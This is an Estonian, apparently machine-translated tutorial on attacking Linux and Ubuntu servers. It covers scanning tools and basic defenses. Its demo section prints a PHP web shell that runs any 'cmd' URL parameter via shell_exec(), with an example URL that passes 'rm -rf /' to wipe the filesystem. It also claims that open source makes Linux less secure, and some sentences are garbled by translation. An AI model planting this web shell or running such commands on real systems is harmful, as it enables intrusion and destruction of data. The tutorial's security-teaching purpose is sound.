Linux OS-i häkkimine: häkkimine Ubuntu (Käskude õpetus)
Linux on kõige laialdasemalt kasutatav serveri operatsioonisüsteem, eriti veebiserverite jaoks. See on avatud lähtekoodiga; see tähendab, et kõigil on juurdepääs lähtekoodile. See muudab selle teiste operatsioonisüsteemidega võrreldes vähem turvaliseks, kuna ründajad saavad turvaaukude leidmiseks uurida lähtekoodi. Linux for Hackers on nende turvaaukude ärakasutamine süsteemile volitamata juurdepääsu saamiseks.
Selles artiklis tutvustame teile, mis on Linux, selle turvaauke ja häkkimist Ubuntu ja vastumeetmed, mida saate rakendada.
Kiire märkus Linuxi kohta
Linux on avatud lähtekoodiga operatsioonisüsteem. Linuxi-põhiseid operatsioonisüsteeme, nagu Redhat, Fedora ja, on palju distributsioone Ubuntujne. Erinevalt teistest operatsioonisüsteemidest on Linux turvalisuse osas vähem turvaline. Selle põhjuseks on asjaolu, et lähtekood on vabalt saadaval, mistõttu on selle turvaaukude uurimine ja nende ärakasutamine lihtne võrreldes teiste operatsioonisüsteemidega, mis pole avatud lähtekoodiga. Linuxi saab kasutada serveri, lauaarvuti, tahvelarvuti või mobiilseadme operatsioonisüsteemina.
Linuxi programme saab juhtida kas GUI või käskude abil. Linuxi käsud Kali Linux häkkimine on GUI kasutamisega võrreldes tõhusam ja tõhusam. Sel põhjusel on abiks häkkimise põhiliste Linuxi käskude tundmine.
Vaadake neid õpetusi https://www.guru99.com/unix-linux-tutorial.html kuidas alustada Kali Linux hacks.
Linuxi häkkimise tööriistad
- Nessus– seda tööriista saab kasutada Ubuntu häkkimine, skannimise konfiguratsiooniseaded, paigad ja võrgud jne leiate aadressilt https://www.tenable.com/products/nessus
- NMap. Seda tööriista saab kasutada serveris töötavate hostide ja nende kasutatavate teenuste jälgimiseks. Seda saab kasutada ka portide otsimiseks. Selle võib leida aadressil https://nmap.org/
- SARA – SARA on akronüüm sõnadest Security Auditor's Research Assistant. Nagu nimigi ütleb, saab seda tööriista kasutada võrkude auditeerimiseks selliste ohtude vastu nagu SQL Injection, XSS jne selle leiate aadressilt http://www-arc.com/sara/sara.html
Ülaltoodud loetelu ei ole ammendav; see annab teile ülevaate saadaolevatest tööriistadest Ubuntu Linuxi süsteemide häkkimine ja häkkimine.
Kuidas vältida Linuxi häkkimist
Linuxi häkkimine kasutab ära operatsioonisüsteemi haavatavusi. Organisatsioon võib enda kaitsmiseks selliste rünnakute eest võtta kasutusele järgmise poliitika.
- Plaastrihaldus– paigad parandavad vead, mida ründajad kasutavad süsteemi ohustamiseks. Hea paigahalduspoliitika tagab, et rakendate oma süsteemile pidevalt asjakohaseid plaastreid.
- Õige OS-i konfiguratsioon– muud ärakasutamise võimalused kasutavad ära serveri konfiguratsiooni nõrkusi. Mitteaktiivsed kasutajanimed ja deemonid tuleks keelata. Muuta tuleks vaikesätteid, nagu rakenduse tavalised paroolid, vaikekasutajanimed ja mõned pordinumbrid.
- Sissetungi tuvastamise süsteem– selliseid tööriistu saab kasutada süsteemile volitamata juurdepääsu tuvastamiseks. Mõned tööriistad suudavad selliseid rünnakuid tuvastada ja ära hoida.
Häkkimistegevus: häkkimine a Ubuntu Linuxi süsteem, mis kasutab PHP-d
Selles praktilises stsenaariumis õpime, kuidas häkkida Ubuntu ja anname teile põhiteavet selle kohta, kuidas saate seda kasutada PHP Linuxi kompromiteerimiseks. Me ei võta sihikule ühtegi ohvrit. Kui soovite seda proovida, saate installida LAMPP oma kohalikku arvutisse.
PHP-l on kaks funktsiooni, mida saab kasutada Linuxi häkkimiskäskude täitmiseks. Sellel on funktsioonid exec() ja shell_exec(). Funktsioon exec() tagastab käsu väljundi viimase rea, samas kui shell_exec() tagastab kogu käsu tulemuse stringina.
Oletame tutvustamise eesmärgil, et ründajate juhid laadivad järgmise faili veebiserverisse.
<?php $cmd = isset($_GET['cmd']) ? $_GET['cmd'] : 'ls -l'; echo "executing shell command:-> $cmd</br>"; $output = shell_exec($cmd); echo "<pre>$output</pre>"; ?>
SIIN,
Ülaltoodud skript saab käsu GET-i muutujast nimega cmd. Käsk täidetakse kasutades shell_exec() ja tulemused tagastatakse brauseris.
Ülaltoodud koodi saab kasutada järgmise URL-i abil
http://localhost/cp/konsole.php?cmd=ls%20-l
SIIN,
- “…konsole.php?cmd=ls%20-l”määrab muutujale cmd väärtuse ls –l.
Käsk sisse Ubuntu serveri vastu häkkimise eest täidetakse kui
shell_exec('ls -l') ;
Ülaltoodud koodi käivitamine veebiserveris annab järgmisega sarnaseid tulemusi.
Ülaltoodud käsk kuvab lihtsalt praeguses kataloogis olevad failid ja õigused
Oletame, et ründaja edastab järgmise käsu
rm -rf /
SIIN,
- "rm" eemaldab failid
- "rf" paneb käsu rm töötama rekursiivses režiimis. Kõigi kaustade ja failide kustutamine
- “/” annab käsu alustada failide kustutamist juurkataloogist
Rünnaku URL näeks välja umbes selline
http://localhost/cp/konsole.php?cmd=rm%20-rf%20/
kokkuvõte
- Linux on populaarne operatsioonisüsteem serverite, lauaarvutite, tahvelarvutite ja mobiilseadmete jaoks.
- Linux on avatud lähtekoodiga ja lähtekoodi võib hankida igaüks. See muudab haavatavuste tuvastamise lihtsaks. See on häkkerite jaoks üks parimaid opsüsteeme.
- Põhilised ja võrgu häkkimise käsud Ubuntu on Linuxi häkkeritele väärtuslikud.
- Haavatavus on nõrkus, mida saab ära kasutada süsteemi ohustamiseks.
- Hea turvalisus võib aidata kaitsta süsteemi ründaja poolt ohustamise eest.